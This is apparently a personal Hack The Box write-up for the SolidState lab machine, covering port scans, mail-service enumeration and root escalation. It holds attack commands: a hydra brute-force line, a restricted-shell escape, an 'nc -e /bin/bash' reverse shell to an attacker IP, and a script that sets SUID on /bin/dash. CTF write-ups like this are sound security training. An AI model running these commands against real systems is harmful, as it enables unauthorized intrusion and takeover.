Comment on page
HTB Write-up SolidState (Linux)

One thing I didn't do was to scan all ports.
There's 4555 open 
​
Nmap Result: 
22/tcp  open  ssh     OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
| ssh-hostkey: 
|   2048 77:00:84:f5:78:b9:c7:d3:54:cf:71:2e:0d:52:6d:8b (RSA)
|   256 78:b8:3a:f6:60:19:06:91:f5:53:92:1d:3f:48:ed:53 (ECDSA)
|_  256 e4:45:e9:ed:07:4d:73:69:43:5a:12:70:9d:c4:af:76 (ED25519)
25/tcp  open  smtp?
|_smtp-commands: Couldn't establish connection on port 25
80/tcp  open  http    Apache httpd 2.4.25 ((Debian))
|_http-title: Home - Solid State Security
|_http-server-header: Apache/2.4.25 (Debian)
110/tcp open  pop3?
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
119/tcp open  nntp?
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
|_sslv2: ERROR: Script execution failed (use -d to debug)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
​
Port 80:
​
SMTP enum: 
found [email protected] for email 
found thi https://www.hackingarticles.in/4-ways-smtp-enumeration/#:~:text=%204%20ways%20to%20SMTP%20Enumeration%20%201,to%20VRFY%2C%20EXPN%2C%20and%20RCPT%20TO...%20More%20 
​
ismtp -h 10.129.29.189 -e email.txt
​
POP3 enum: 
 
\
JAMES 
running nmap -p 110,995 --script "pop3-capabilities or pop3-ntlm-info" -sV 10.129.29.189 
nothing 
brute forcing pop authentication with hydra...no luck? 
hydra -l USERNAME -P /path/to/passwords.txt -f <IP> pop3 -V
119 NNTP Enum: 
​
4555  RSIP 
nc 10.129.29.189 4555
got in
reset password for users
​
signed in from Evolution and got a valuable email
Now we are in mindy! 
​
when I first logged in, it had a restricted shell so I used the trick below.
ssh [email protected] -t "bash --noprofile" 
According to the ssh manual page, 
 -t      Force pseudo-terminal allocation.  This can be used to exe‐
             cute arbitrary screen-based programs on a remote machine,
             which can be very useful, e.g. when implementing menu ser‐
             vices.  Multiple -t options force tty allocation, even if
             ssh has no local tty.
now I can see other files.
let's see if we can connect via nc -e /bin/bash 10.10.14.131 1234
it worked! 
Let's plug this in in the tmp.py
I waited for a min, and I got a root shell! 
Another way to get the root:
#!/usr/bin/env python
import os 
import sys
​
try: 
    os.system("chmod 4755 /bin/dash")
except:
    sys.exit() 
    
​
#4 -> setuid bit 755 default perm for most binary
​
dash -> another terminal. doesn't strip the setuid bit like bash doesn't. 
so if we can set the SUID bit separately and execute it, then we can escalate privilege. 
type "dash" to call the executable once the permission is confirmed to be changed to -rwsr 
​
HTB Write-up Jeeves (Windows)
HTB Write-up Nineveh
Last modified 1yr ago